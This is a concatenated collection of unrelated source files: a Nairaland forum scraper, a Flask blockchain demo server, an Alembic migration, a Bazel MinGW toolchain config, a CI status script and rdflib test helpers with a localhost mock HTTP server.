    if page > 0:
        url = url+'/'+str(page)
    browser = self.browser
    browser.get_url(url)
    trending = {}
    trending['meta'] = {}
    pagination = browser.driver.find_element_by_xpath('/html/body/div/p[1]')
    table = browser.driver.find_element_by_xpath('/html/body/div/table[2]')
    links = table.find_elements_by_tag_name('tr')
    anchors = pagination.find_elements_by_tag_name('a')
    trending['meta'] = {}
    # NOTE(review): both branches assign the same next_page value.
    if page < len(anchors):
        trending['meta']['next_page'] = page + 1
    else:
        trending['meta']['next_page'] = page + 1
    trending['meta']['page'] = page
    trending['meta']['per_page'] = len(links)
    if page > 0:
        trending['meta']['previous_page'] = page - 1
    else:
        trending['meta']['previous_page'] = page
    trending['meta']['total_pages'] = len(anchors)
    trending['meta']['total_entries'] = trending['meta']['per_page'] * trending['meta']['total_pages']
    trending['data'] = []
    for link in links:
        datum = {}
        beautiful = BeautifulSoup(link.get_attribute('innerHTML'), 'lxml')
        # First <b> holds the category link, second the topic link.
        # NOTE(review): unlike similar methods there is no guard for rows
        # without <b> tags -- bs[0]/bs[1] may raise IndexError on headers.
        bs = beautiful.find_all('b')
        category = bs[0]
        a = category.find('a')
        datum['category'] = {}
        datum['category']['url'] = self.BASE_URL+a['href']
        datum['category']['name'] = a.text
        topic = bs[1]
        b = topic.find('a')
        datum['title'] = b.text
        datum['url'] = self.BASE_URL+b['href']
        # The stats <span> holds creator, post/view counts and timestamps.
        span = beautiful.find('span')
        bs = span.find_all('b')
        ass = span.find_all('a')
        ac = ass[0]
        datum['creator'] = {}
        datum['creator']['name'] = ac.text
        datum['creator']['url'] = self.BASE_URL+ac['href']
        datum['posts'] = bs[1].text
        datum['views'] = bs[2].text
        datum['last_post_time'] = str(dateparser.parse(bs[3].text))
        datum['last_post_creator'] = {}
        if len(ass) > 1:
            lc = ass[1]
            datum['last_post_creator']['name'] = lc.text
            datum['last_post_creator']['url'] = self.BASE_URL+lc['href']
        # Re-derive the last-post time from the span's trailing text,
        # overwriting the bs[3]-based value parsed above.
        whole_text = span.text
        first_split = whole_text.split(' ')
        last_element = first_split[len(first_split)-1]
        new_text = whole_text.replace(last_element, '')
        second_split = new_text.split(' views. ')
        datum['last_post_time'] = str(dateparser.parse(second_split[1]))
        trending['data'].append(datum)
    return trending
def category_topics(self, category, page=0):
    """Scrape one page of topics in a board/category.

    :param category: category slug or id used as the URL path segment.
    :param page: zero-based page number.
    :return: dict with ``meta`` pagination info and ``data``, a list of
        topic dicts (title, url, id, creator, posts, views, ...).
    """
    url = self.BASE_URL+'/'+str(category)
    if page > 0:
        url = url+'/'+str(page)
    browser = self.browser
    browser.get_url(url)
    trending = {}
    trending['meta'] = {}
    # Category pages keep pagination in p[4] and the listing in table[3]
    # (unlike the other listings) -- assumes this page layout.
    pagination = browser.driver.find_element_by_xpath('/html/body/div/p[4]')
    table = browser.driver.find_element_by_xpath('/html/body/div/table[3]')
    links = table.find_elements_by_tag_name('td')
    anchors = pagination.find_elements_by_tag_name('a')
    trending['meta'] = {}
    # NOTE(review): both branches assign the same next_page value.
    if page < len(anchors):
        trending['meta']['next_page'] = page + 1
    else:
        trending['meta']['next_page'] = page + 1
    trending['meta']['page'] = page
    trending['meta']['per_page'] = len(links)
    if page > 0:
        trending['meta']['previous_page'] = page - 1
    else:
        trending['meta']['previous_page'] = page
    trending['meta']['total_pages'] = len(anchors)
    trending['meta']['total_entries'] = trending['meta']['per_page'] * trending['meta']['total_pages']
    trending['data'] = []
    for link in links:
        datum = {}
        beautiful = BeautifulSoup(link.get_attribute('innerHTML'), 'lxml')
        b = beautiful.find('b')
        a = b.find('a')
        datum['url'] = self.BASE_URL+a['href']
        # Topic id is the first path segment after the host.
        split_list = datum['url'].split('/')
        datum['id'] = split_list[3]
        datum['title'] = a.text
        span = beautiful.find('span')
        bs = span.find_all('b')
        creator = bs[0]
        ac = creator.find('a')
        datum['creator'] = {}
        if ac:
            datum['creator']['name'] = ac.text
            datum['creator']['url'] = self.BASE_URL+ac['href']
        if len(bs) > 1:
            datum['posts'] = bs[1].text
        if len(bs) > 2:
            datum['views'] = bs[2].text
            # NOTE(review): bs[3] is only safe when len(bs) > 3; the
            # guard above checks > 2 -- confirm against real markup.
            datum['last_post_time'] = str(dateparser.parse(bs[3].text))
        datum['last_post_creator'] = {}
        ass = span.find_all('a')
        if len(ass) > 1:
            lc = ass[1]
            datum['last_post_creator']['name'] = lc.text
            datum['last_post_creator']['url'] = self.BASE_URL+lc['href']
        # Re-derive the last-post time from the span's trailing text.
        whole_text = span.text
        first_split = whole_text.split(' ')
        last_element = first_split[len(first_split)-1]
        new_text = whole_text.replace(last_element, '')
        second_split = new_text.split(' views. ')
        if len(second_split) > 1:
            datum['last_post_time'] = str(dateparser.parse(second_split[1]))
        trending['data'].append(datum)
    return trending
def topic_posts(self, slug_id, page=0):
    """Scrape one page of posts inside a topic.

    :param slug_id: topic path of the form ``<id>/<slug>``.
    :param page: zero-based page number.
    :return: dict with ``meta`` pagination info, a ``topic`` summary and
        ``data``, a list of post dicts (content, likes, shares, user).
    """
    url = self.BASE_URL+'/'+str(slug_id)
    if page > 0:
        url = url+'/'+str(page)
    browser = self.browser
    browser.get_url(url)
    trending = {}
    trending['meta'] = {}
    pagination = browser.driver.find_element_by_xpath('/html/body/div/p[1]')
    table = browser.driver.find_element_by_xpath('/html/body/div/table[2]')
    # The breadcrumb paragraph doubles as the category source.
    category = browser.driver.find_element_by_xpath('/html/body/div/p[1]')
    category_links = category.find_elements_by_tag_name('a')
    links = table.find_elements_by_tag_name('tr')
    anchors = pagination.find_elements_by_tag_name('a')
    trending['meta'] = {}
    # NOTE(review): both branches assign the same next_page value.
    if page < len(anchors):
        trending['meta']['next_page'] = page + 1
    else:
        trending['meta']['next_page'] = page + 1
    trending['meta']['page'] = page
    trending['meta']['per_page'] = len(links)
    if page > 0:
        trending['meta']['previous_page'] = page - 1
    else:
        trending['meta']['previous_page'] = page
    trending['meta']['total_pages'] = len(anchors)
    trending['meta']['total_entries'] = trending['meta']['per_page'] * trending['meta']['total_pages']
    trending['data'] = []
    # Topic id is the first path segment of the request URL.
    splitted = url.split('/')
    trending['topic'] = {}
    trending['topic']['id'] = splitted[3]
    trending['topic']['title'] = browser.driver.title.split('-')[0].strip()
    trending['topic']['category'] = {}
    # Second-to-last breadcrumb link is the topic's category.
    cat_a = category_links[len(category_links) - 2]
    trending['topic']['category']['name'] = cat_a.text
    trending['topic']['category']['url'] = cat_a.get_attribute('href')
    beautiful = BeautifulSoup(browser.driver.page_source, 'lxml')
    headings = beautiful.find_all("td", class_="bold l pu")
    posts = beautiful.find_all("td", class_="l w pd")
    # print(f'[BeautifulSoup] Found {len(posts)} posts.')
    trending['data'] = []
    for l in range(len(posts)):
        # if keyword not in posts[l].text:
        #     continue
        data = {}
        # Post body lives in the cell's <div>.
        div = posts[l].find('div')
        data['content'] = div.text
        try:
            p = posts[l].find('p')
            bs = p.find_all('b')
            data['likes'] = int(bs[0].text)
            data['shares'] = int(bs[1].text)
        except:
            data['likes'] = 0
            data['shares'] = 0
        a_s = headings[l].find_all('a')
        # get date time
        try:
            span = headings[l].find('span')
            split = span.text
            data['date_posted'] = str(dateparser.parse(split.rstrip()))
        except:
            data['date_posted'] = None
        data['user'] = {}
        for a in a_s:
            if a.has_attr('class'):
                # Anchors with a class attribute are the author link.
                data['user']['url'] = self.BASE_URL + str(a['href'])
                data['user']['name'] = a.text
                continue
        trending['data'].append(data)
    return trending
def search(self, search_term, board=0, page=0):
    """Search Nairaland for posts matching *search_term*.

    :param search_term: text to search for.
    :param board: numeric board id to restrict the search to (0 = all).
    :param page: zero-based results page.
    :return: dict with ``meta`` pagination info, the echoed ``keyword``
        and ``data``, a list of matching post dicts.
    """
    if page > 0:
        # Bug fix: `board` is an int (default 0); the original concatenated
        # it directly onto a str, raising TypeError whenever page > 0.
        url = "https://www.nairaland.com/search?q=" + search_term + "&board=" + str(board)
    else:
        url = "https://www.nairaland.com/search/" + search_term + "/0/" + str(board) + "/0/1/" + str(page)
    browser = self.browser
    browser.get_url(url)
    trending = {}
    trending['meta'] = {}
    pagination = browser.driver.find_element_by_xpath('/html/body/div/p[1]')
    table = browser.driver.find_element_by_xpath('/html/body/div/table[2]')
    links = table.find_elements_by_tag_name('tr')
    anchors = pagination.find_elements_by_tag_name('a')
    trending['keyword'] = search_term
    # The original branched on `page < len(anchors)` but assigned the same
    # value in both branches; the dead conditional is collapsed here.
    trending['meta']['next_page'] = page + 1
    trending['meta']['page'] = page
    trending['meta']['per_page'] = len(links)
    if page > 0:
        trending['meta']['previous_page'] = page - 1
    else:
        trending['meta']['previous_page'] = page
    trending['meta']['total_pages'] = len(anchors)
    trending['meta']['total_entries'] = trending['meta']['per_page'] * trending['meta']['total_pages']
    trending['data'] = []
    beautiful = BeautifulSoup(browser.driver.page_source, 'lxml')
    headings = beautiful.find_all("td", class_="bold l pu")
    posts = beautiful.find_all("td", class_="l w pd")
    for l in range(len(posts)):
        data = {}
        # Post body lives in the cell's <div>.
        div = posts[l].find('div')
        data['content'] = div.text
        try:
            p = posts[l].find('p')
            bs = p.find_all('b')
            data['likes'] = int(bs[0].text)
            data['shares'] = int(bs[1].text)
        except Exception:  # stats paragraph missing or malformed
            data['likes'] = 0
            data['shares'] = 0
        a_s = headings[l].find_all('a')
        # get date time
        try:
            span = headings[l].find('span')
            split = span.text
            data['date_posted'] = str(dateparser.parse(split.rstrip()))
        except Exception:  # no timestamp on this heading
            data['date_posted'] = None
        data['user'] = {}
        data['topic'] = {}
        data['topic']['category'] = {}
        for a in a_s:
            if a.has_attr('class'):
                data['user']['url'] = self.BASE_URL + str(a['href'])
                data['user']['name'] = a.text
                continue
            if a.has_attr('href'):
                if '#' in a['href']:
                    data['url'] = self.BASE_URL + str(a['href'])
                    splitted = a['href'].split('/')
                    data['topic']['id'] = splitted[1]
                    data['topic']['title'] = a.text.replace('Re: ', '')
                    split = data['url'].split('#')
                    data['topic']['url'] = split[0]
                    data['id'] = split[1]
                else:
                    data['topic']['category']['url'] = self.BASE_URL + a['href']
                    data['topic']['category']['name'] = a.text
                continue
        trending['data'].append(data)
    return trending
| StarcoderdataPython |
3219581 | #!/usr/bin/env python3
"""
blockchain_db_server.py - BlockchainDB Server
Author: <NAME> (<EMAIL>)
Date: 12/5/2017
"""
from flask import Flask, jsonify, render_template
from uuid import uuid4
from random import randint
import random
from blockchain_db import BlockchainDB
app = Flask(__name__)
blockchain_db_manager = BlockchainDB()
@app.route('/', methods=['GET'])
def hello_world():
    """Landing page: greet the visitor with a welcome banner."""
    context = {'header': 'Welcome to BlockchainDB'}
    return render_template('landing.html', data=context)
@app.route('/reset', methods=['GET'])
def reset():
    """Wipe the chain database and recreate the genesis block.

    Call once at startup, or any time a fresh chain is wanted.
    """
    blockchain_db_manager.reset()
    context = {'header': 'Successfully generated a genesis block'}
    return render_template('landing.html', data=context)
@app.route('/mine/<int:number>', methods=['GET'])
def mine_blocks(number):
    """Mine *number* blocks, each filled with randomly generated
    transactions (the per-block transaction count is drawn once)."""
    transactions_range = randint(1, 10)
    for _ in range(number):
        for _ in range(transactions_range):
            sender = str(uuid4()).replace('-', '')[:-10]
            recipient = str(uuid4()).replace('-', '')[:-10]
            blockchain_db_manager.add_transaction(
                sender=sender,
                recipient=recipient,
                amount=round(random.uniform(1, 10), 2),
            )
        blockchain_db_manager.mine_for_next_block()
    context = {'header': 'Successfully mined {0} blocks'.format(number)}
    return render_template('landing.html', data=context)
@app.route('/view/chain', methods=['GET'])
def view_blockchain():
    """Render every block currently stored in the chain."""
    context = {
        'chain': blockchain_db_manager.get_all_blocks(),
        'length': blockchain_db_manager.get_length(),
        'header': 'Full chain',
    }
    return render_template('chain.html', data=context)
@app.route('/view/last_blocks/<int:number>', methods=['GET'])
def view_last_n_block(number):
    """Render the most recent *number* blocks, newest first.

    :param number: how many trailing blocks to show.
    """
    blocks = blockchain_db_manager.get_last_n_blocks(number)
    # Reverse so the latest block is listed first.
    newest_first = [blocks[i] for i in range(number - 1, -1, -1)]
    context = {
        'chain': newest_first,
        'length': number,
        'header': 'Last {0} Blocks'.format(number),
    }
    return render_template('chain.html', data=context)
@app.route('/view/last_block', methods=['GET'])
def view_last_block():
    """Render only the most recently mined block."""
    context = {
        'chain': [blockchain_db_manager.get_last_block()],
        'length': 1,
        'header': 'Last Block',
    }
    return render_template('chain.html', data=context)
@app.route('/view/genesis_block', methods=['GET'])
def view_genesis_block():
    """Render the very first (genesis) block of the chain."""
    context = {
        'chain': [blockchain_db_manager.get_genesis_block()],
        'length': 1,
        'header': 'Genesis Block',
    }
    return render_template('chain.html', data=context)
@app.route('/view/block/<int:number>', methods=['GET'])
def view_block(number):
    """Render the single block at the given chain height.

    :param number: block height to look up.
    """
    context = {
        'chain': [blockchain_db_manager.get_block(number)],
        'length': 1,
        'header': 'Block {0}'.format(number),
    }
    return render_template('chain.html', data=context)
@app.route('/view/top/<int:number>/<string:state>', methods=['GET'])
def view_top_blocks(number, state):
    """Render the top *number* blocks ranked by *state*.

    :param number: how many blocks to show.
    :param state: ranking key, e.g. difficulty, elapsed_time,
        block_reward, hash_power, height, nonce, number_of_transaction.
    """
    blocks = blockchain_db_manager.get_top_blocks(state=state, number=number)
    # Reverse so the highest-ranked block is listed first.
    newest_first = [blocks[i] for i in range(number - 1, -1, -1)]
    context = {
        'chain': newest_first,
        'length': number,
        'header': 'Top {0} {1}'.format(number, state),
    }
    return render_template('chain.html', data=context)
if __name__ == '__main__':
app.run() | StarcoderdataPython |
def first_last(full_name):
    """Print the text before the first space as the first name and the
    remaining non-space characters as the last name.

    Note: every space character is discarded, so a multi-part surname is
    printed with its internal spaces removed (matching the original
    character-by-character scan).
    """
    first_name, _, remainder = full_name.partition(' ')
    last_name = remainder.replace(' ', '')
    print('First: ', first_name)
    print('Last: ', last_name)
first_last('<NAME>')
| StarcoderdataPython |
3261897 | """adding valuable tokens to article
Revision ID: <KEY>
Revises: <PASSWORD>
Create Date: 2017-05-10 16:13:43.117796
"""
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Apply: add the nullable pickled ``valuable_tokens`` column to
    the ``article`` table."""
    op.add_column('article',
        sa.Column('valuable_tokens', sa.PickleType(), nullable=True))
def downgrade():
    """Revert: drop ``article.valuable_tokens``.

    Uses batch mode so the drop also works on SQLite, which cannot
    ALTER TABLE DROP COLUMN directly.
    """
    with op.batch_alter_table('article') as batch_op:
        batch_op.drop_column('valuable_tokens')
| StarcoderdataPython |
# filename: BrAinPI/old/test_mem_tiff.py
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 2 21:16:30 2022

@author: alpha

Round-trips a random uint16 image through an in-memory TIFF: write it
into a BytesIO buffer with tifffile, then read it back from the raw
bytes.
"""
import io
from skimage import img_as_uint
import numpy as np
import tifffile as tf
import tempfile  # NOTE(review): imported but unused in this snippet
# Build a random 10x10 float image and convert it to uint16.
image = np.random.random((10,10))
image = img_as_uint(image)
# Serialize the image as a TIFF into an in-memory buffer, then grab the
# raw bytes.
img_ram = io.BytesIO()
tf.imwrite(img_ram,image)
img_ram = bytearray(img_ram.getvalue())
# Read the TIFF back from the raw bytes to verify the round trip.
tf.imread(io.BytesIO(img_ram))
| StarcoderdataPython |
3252055 | # NEW
load("@bazel_tools//tools/build_defs/cc:action_names.bzl", "ACTION_NAMES")
# NEW
load(
"@bazel_tools//tools/cpp:cc_toolchain_config_lib.bzl",
"artifact_name_pattern",
"feature",
"flag_group",
"flag_set",
"tool_path",
)
def mingw_directories(mingw_version):
    """Built-in MinGW system include directories for a given GCC version."""
    gcc_dir = "C:/MinGW/lib/gcc/mingw32/%s" % mingw_version
    return [
        "C:/MinGW/include",
        "C:/MinGW/mingw32/include",
        gcc_dir + "/include-fixed",
        gcc_dir + "/include",
        gcc_dir,
    ]
# Link actions whose command lines should receive the default linker flags.
all_link_actions = [
    ACTION_NAMES.cpp_link_executable,
    ACTION_NAMES.cpp_link_dynamic_library,
    ACTION_NAMES.cpp_link_nodeps_dynamic_library,
]
def _impl(ctx):
    """Rule implementation: describe a local MinGW GCC installation on
    Windows as a CcToolchainConfigInfo provider.

    Include paths come from the rule's `builtin_include_directories`
    attribute; tool binaries are hard-coded under C:/MinGW/bin.
    """
    cxx_builtin_include_directories = ctx.attr.builtin_include_directories

    # Absolute paths to the MinGW binutils/GCC tools Bazel will invoke.
    tool_paths = [
        tool_path(
            name = "gcc",
            path = "C:/MinGW/bin/gcc",
        ),
        tool_path(
            name = "ld",
            path = "C:/MinGW/bin/ld",
        ),
        tool_path(
            name = "ar",
            path = "C:/MinGW/bin/ar",
        ),
        tool_path(
            name = "cpp",
            path = "C:/MinGW/bin/cpp",
        ),
        tool_path(
            name = "gcov",
            path = "C:/MinGW/bin/gcov",
        ),
        tool_path(
            name = "nm",
            path = "C:/MinGW/bin/nm",
        ),
        tool_path(
            name = "objdump",
            path = "C:/MinGW/bin/objdump",
        ),
        tool_path(
            name = "strip",
            path = "C:/MinGW/bin/strip",
        ),
    ]

    # Always link against libstdc++ for every link action.
    features = [
        feature(
            name = "default_linker_flags",
            enabled = True,
            flag_sets = [
                flag_set(
                    actions = all_link_actions,
                    flag_groups = ([
                        flag_group(
                            flags = [
                                "-lstdc++",
                            ],
                        ),
                    ]),
                ),
            ],
        ),
    ]

    return cc_common.create_cc_toolchain_config_info(
        ctx = ctx,
        features = features,
        cxx_builtin_include_directories = cxx_builtin_include_directories,
        toolchain_identifier = "local",
        host_system_name = "local",
        target_system_name = "local",
        target_cpu = "x64_windows",
        target_libc = "unknown",
        compiler = "gcc",
        abi_version = "unknown",
        abi_libc_version = "unknown",
        tool_paths = tool_paths,
        # MinGW produces Windows-style executables: no prefix, ".exe".
        artifact_name_patterns = [
            artifact_name_pattern(
                category_name = "executable",
                prefix = "",
                extension = ".exe",
            ),
        ],
    )
# Rule that materializes the MinGW toolchain configuration above; the only
# attribute is the list of default include paths (see mingw_directories).
cc_toolchain_config = rule(
    implementation = _impl,
    attrs = {
        "builtin_include_directories": attr.string_list(
            doc = "Default include paths",
        ),
    },
    provides = [CcToolchainConfigInfo],
)
| StarcoderdataPython |
129114 | # from . import quantities
# from . import numpy_attributes
| StarcoderdataPython |
# repo: scottviteri/verified-betrfs
#!/usr/bin/env python3
# Copyright 2018-2021 VMware, Inc., Microsoft Inc., Carnegie Mellon University, ETH Zurich, and University of Washington
# SPDX-License-Identifier: BSD-2-Clause
import os
import shutil
import subprocess
import sys
def callOrDie(*kargs):
    """Invoke ``subprocess.call`` with the given arguments and raise if
    the command exits non-zero.

    The first positional argument (normally the argv list) is echoed in
    the failure message.
    """
    exit_status = subprocess.call(*kargs)
    if exit_status != 0:
        raise Exception("%s call failed" % kargs[0])
def main():
    """Publish a CI status report: verify the working tree is clean,
    build the status PDF, and commit it under the current git hash."""
    os.chdir("../continuous-integration")
    # Refuse to run on a dirty tree -- the commit-hash directory name
    # would not match the actual file contents.
    result = subprocess.Popen(["git", "status"], stdout=subprocess.PIPE).communicate()[0].decode('utf-8')
    if "nothing to commit, working tree clean" not in result:
        raise Exception("Git unclean; git commit hash label would be a lie.")
    githash = subprocess.Popen(["git", "rev-parse", "HEAD"], stdout=subprocess.PIPE).communicate()[0].strip().decode('utf-8')
    # Build the status report, then file it under a directory named after
    # the commit hash and push it.
    callOrDie(["make", "-C", "../disk-betree", "status"])
    os.mkdir(githash)
    shutil.copy("../build/disk-betree/Bundle.i.status.pdf", githash)
    callOrDie(["git", "add", githash])
    callOrDie(["git", "commit", "-m", "CI Status Report"])
    callOrDie(["git", "push"])

main()
| StarcoderdataPython |
# gh_stars: 0
from __future__ import print_function
import datetime
import email.message
import os
import random
import sys
import unittest
from contextlib import AbstractContextManager, contextmanager
from http.server import BaseHTTPRequestHandler, HTTPServer, SimpleHTTPRequestHandler
from pathlib import PurePath, PureWindowsPath
from threading import Thread
from traceback import print_exc
from types import TracebackType
from typing import (
TYPE_CHECKING,
Any,
Callable,
Collection,
Dict,
Generator,
Iterable,
Iterator,
List,
NamedTuple,
Optional,
Set,
Tuple,
Type,
TypeVar,
Union,
cast,
)
from unittest.mock import MagicMock, Mock
from urllib.error import HTTPError
from urllib.parse import ParseResult, parse_qs, unquote, urlparse
from urllib.request import urlopen
import isodate
import pytest
from _pytest.mark.structures import Mark, MarkDecorator, ParameterSet
from nturl2path import url2pathname as nt_url2pathname
import rdflib.compare
import rdflib.plugin
from rdflib import BNode, ConjunctiveGraph, Graph
from rdflib.plugin import Plugin
from rdflib.term import Identifier, Literal, Node, URIRef
PluginT = TypeVar("PluginT")


def get_unique_plugins(
    type: Type[PluginT],
) -> Dict[Type[PluginT], Set[Plugin[PluginT]]]:
    """Group every registered rdflib plugin of *type* by the class each
    plugin resolves to."""
    grouped: Dict[Type[PluginT], Set[Plugin[PluginT]]] = {}
    for plugin in rdflib.plugin.plugins(None, type):
        grouped.setdefault(plugin.getClass(), set()).add(plugin)
    return grouped
def get_unique_plugin_names(type: Type[PluginT]) -> Set[str]:
    """Return one representative plugin name for each distinct plugin
    class registered for *type*."""
    return {
        next(iter(plugin_set)).name
        for plugin_set in get_unique_plugins(type).values()
    }
if TYPE_CHECKING:
import typing_extensions as te
def get_random_ip(parts: Optional[List[str]] = None) -> str:
    """Build a dotted-quad IPv4 string, filling missing octets randomly.

    :param parts: leading octets (as strings) to keep; defaults to
        ``["127"]``. The caller's list is not modified (the original
        implementation appended to it in place).
    :return: an IPv4 address string with four octets (more if *parts*
        already contained more than four, matching the old behavior).
    """
    # Copy so the caller's list is never mutated.
    octets = ["127"] if parts is None else list(parts)
    for _ in range(4 - len(octets)):
        octets.append(f"{random.randint(0, 255)}")
    return ".".join(octets)
@contextmanager
def ctx_http_server(
    handler: Type[BaseHTTPRequestHandler], host: str = "127.0.0.1"
) -> Iterator[HTTPServer]:
    """Serve *handler* on an ephemeral port in a daemon thread.

    Yields the running ``HTTPServer`` (its bound host/port is available
    as ``server.server_address``) and tears it down cleanly on exit.
    """
    server = HTTPServer((host, 0), handler)  # port 0: OS picks a free port
    server_thread = Thread(target=server.serve_forever)
    server_thread.daemon = True
    server_thread.start()
    yield server
    # Stop serve_forever first, then close the socket and join the
    # worker thread -- this order avoids races on shutdown.
    server.shutdown()
    server.socket.close()
    server_thread.join()
IdentifierTriple = Tuple[Identifier, Identifier, Identifier]
IdentifierTripleSet = Set[IdentifierTriple]
IdentifierQuad = Tuple[Identifier, Identifier, Identifier, Identifier]
IdentifierQuadSet = Set[IdentifierQuad]
class GraphHelper:
    """
    Provides methods which are useful for working with graphs.
    """

    @classmethod
    def identifier(self, node: Node) -> Identifier:
        """
        Return the identifier of the provided node.
        """
        # NOTE(review): first argument of this classmethod is named
        # ``self``; conventionally it should be ``cls`` like its siblings.
        if isinstance(node, Graph):
            return node.identifier
        else:
            return cast(Identifier, node)

    @classmethod
    def identifiers(cls, nodes: Tuple[Node, ...]) -> Tuple[Identifier, ...]:
        """
        Return the identifiers of the provided nodes.
        """
        result = []
        for node in nodes:
            result.append(cls.identifier(node))
        return tuple(result)

    @classmethod
    def triple_set(
        cls, graph: Graph, exclude_blanks: bool = False
    ) -> IdentifierTripleSet:
        """
        Extract the set of all triples from the supplied graph,
        optionally skipping triples that contain any blank node.
        """
        result = set()
        for sn, pn, on in graph.triples((None, None, None)):
            s, p, o = cls.identifiers((sn, pn, on))
            if exclude_blanks and (
                isinstance(s, BNode) or isinstance(p, BNode) or isinstance(o, BNode)
            ):
                continue
            result.add((s, p, o))
        return result

    @classmethod
    def triple_sets(
        cls, graphs: Iterable[Graph], exclude_blanks: bool = False
    ) -> List[IdentifierTripleSet]:
        """
        Extracts one triple set per supplied graph, in order.
        """
        result: List[IdentifierTripleSet] = []
        for graph in graphs:
            result.append(cls.triple_set(graph, exclude_blanks))
        return result

    @classmethod
    def quad_set(
        cls, graph: ConjunctiveGraph, exclude_blanks: bool = False
    ) -> IdentifierQuadSet:
        """
        Extracts the set of all quads from the supplied ConjunctiveGraph.
        """
        result = set()
        for sn, pn, on, gn in graph.quads((None, None, None, None)):
            s, p, o, g = cls.identifiers((sn, pn, on, gn))
            if exclude_blanks and (
                isinstance(s, BNode)
                or isinstance(p, BNode)
                or isinstance(o, BNode)
                or isinstance(g, BNode)
            ):
                continue
            result.add((s, p, o, g))
        return result

    @classmethod
    def triple_or_quad_set(
        cls, graph: Graph, exclude_blanks: bool = False
    ) -> Union[IdentifierQuadSet, IdentifierTripleSet]:
        """
        Extracts quad or triple sets depending on whether or not the graph is
        ConjunctiveGraph or a normal Graph.
        """
        if isinstance(graph, ConjunctiveGraph):
            return cls.quad_set(graph, exclude_blanks)
        return cls.triple_set(graph, exclude_blanks)

    @classmethod
    def assert_triple_sets_equals(
        cls, lhs: Graph, rhs: Graph, exclude_blanks: bool = False
    ) -> None:
        """
        Asserts that the triple sets in the two graphs are equal.
        """
        lhs_set = cls.triple_set(lhs, exclude_blanks)
        rhs_set = cls.triple_set(rhs, exclude_blanks)
        assert lhs_set == rhs_set

    @classmethod
    def assert_quad_sets_equals(
        cls, lhs: ConjunctiveGraph, rhs: ConjunctiveGraph, exclude_blanks: bool = False
    ) -> None:
        """
        Asserts that the quad sets in the two graphs are equal.
        """
        lhs_set = cls.quad_set(lhs, exclude_blanks)
        rhs_set = cls.quad_set(rhs, exclude_blanks)
        assert lhs_set == rhs_set

    @classmethod
    def assert_sets_equals(
        cls, lhs: Graph, rhs: Graph, exclude_blanks: bool = False
    ) -> None:
        """
        Asserts that the quad or triple sets from the two graphs are equal.
        """
        lhs_set = cls.triple_or_quad_set(lhs, exclude_blanks)
        rhs_set = cls.triple_or_quad_set(rhs, exclude_blanks)
        assert lhs_set == rhs_set

    @classmethod
    def format_set(
        cls,
        item_set: Union[IdentifierQuadSet, IdentifierTripleSet],
        prefix: str = " ",
        sort: bool = False,
    ) -> str:
        """
        Format a triple/quad set one item per line, each prefixed with
        *prefix*; optionally sorted for stable output.
        """
        items = []
        use_item_set = sorted(item_set) if sort else item_set
        for item in use_item_set:
            items.append(f"{prefix}{item}")
        return "\n".join(items)

    @classmethod
    def format_graph_set(
        cls, graph: Graph, prefix: str = " ", sort: bool = False
    ) -> str:
        """
        Format the triple or quad set of *graph* via :meth:`format_set`.
        """
        return cls.format_set(cls.triple_or_quad_set(graph), prefix, sort)

    @classmethod
    def assert_isomorphic(
        cls, lhs: Graph, rhs: Graph, message: Optional[str] = None
    ) -> None:
        """
        This asserts that the two graphs are isomorphic, providing a nicely
        formatted error message if they are not.
        """

        def format_report(message: Optional[str] = None) -> str:
            # Diff the graphs so the failure message shows what is shared
            # and what is unique to each side.
            in_both, in_lhs, in_rhs = rdflib.compare.graph_diff(lhs, rhs)
            preamle = "" if message is None else f"{message}\n"
            return (
                f"{preamle}in both:\n"
                f"{cls.format_graph_set(in_both)}"
                "\nonly in first:\n"
                f"{cls.format_graph_set(in_lhs, sort = True)}"
                "\nonly in second:\n"
                f"{cls.format_graph_set(in_rhs, sort = True)}"
            )

        assert rdflib.compare.isomorphic(lhs, rhs), format_report(message)

    @classmethod
    def strip_literal_datatypes(cls, graph: Graph, datatypes: Set[URIRef]) -> None:
        """
        Strips datatypes in the provided set from literals in the graph.
        """
        for object in graph.objects():
            if not isinstance(object, Literal):
                continue
            if object.datatype is None:
                continue
            if object.datatype in datatypes:
                # Mutates the literal's private slot in place.
                object._datatype = None
GenericT = TypeVar("GenericT", bound=Any)


def make_spypair(method: GenericT) -> Tuple[GenericT, Mock]:
    """Wrap *method* so each call is also recorded on a MagicMock spy.

    Returns the wrapping callable (which also carries the spy as its
    ``mock`` attribute) together with the spy itself.
    """
    spy = MagicMock()

    def spying_wrapper(self: Any, *args: Any, **kwargs: Any) -> Any:
        spy(*args, **kwargs)
        return method(self, *args, **kwargs)

    setattr(spying_wrapper, "mock", spy)
    return cast(GenericT, spying_wrapper), spy
HeadersT = Dict[str, List[str]]
PathQueryT = Dict[str, List[str]]
class MockHTTPRequests(NamedTuple):
    """One HTTP request as captured by the mock HTTP server handler."""

    method: str  # HTTP verb, e.g. "GET" or "POST"
    path: str  # raw request path, including any query string
    parsed_path: ParseResult  # urlparse() of `path`
    path_query: PathQueryT  # parse_qs() of the query component
    headers: email.message.Message  # request headers as received
class MockHTTPResponse(NamedTuple):
    """A canned HTTP response for the mock HTTP server to send."""

    status_code: int  # e.g. 200, 404
    reason_phrase: str  # e.g. "OK", "Not Found"
    body: bytes  # raw response body
    headers: HeadersT  # header name -> list of values
class SimpleHTTPMock:
    """
    SimpleHTTPMock allows testing of code that relies on an HTTP server.

    NOTE: Currently only the GET and POST methods are supported.

    Objects of this class keep a list of responses for each method (GET,
    POST, etc...) and return these responses for these methods in sequence.

    All requests received are appended to a method specific list.

    Example usage:
    >>> httpmock = SimpleHTTPMock()
    >>> with ctx_http_server(httpmock.Handler) as server:
    ...     url = "http://{}:{}".format(*server.server_address)
    ...     # add a response the server should give:
    ...     httpmock.do_get_responses.append(
    ...         MockHTTPResponse(404, "Not Found", b"gone away", {})
    ...     )
    ...
    ...     # send a request to get the first response
    ...     http_error: Optional[HTTPError] = None
    ...     try:
    ...         urlopen(f"{url}/bad/path")
    ...     except HTTPError as caught:
    ...         http_error = caught
    ...
    ...     assert http_error is not None
    ...     assert http_error.code == 404
    ...
    ...     # get and validate request that the mock received
    ...     req = httpmock.do_get_requests.pop(0)
    ...     assert req.path == "/bad/path"
    """

    # TODO: add additional methods (PUT, PATCH, ...) similar to GET and POST
    def __init__(self):
        # Captured requests and pending canned responses, per HTTP method.
        self.do_get_requests: List[MockHTTPRequests] = []
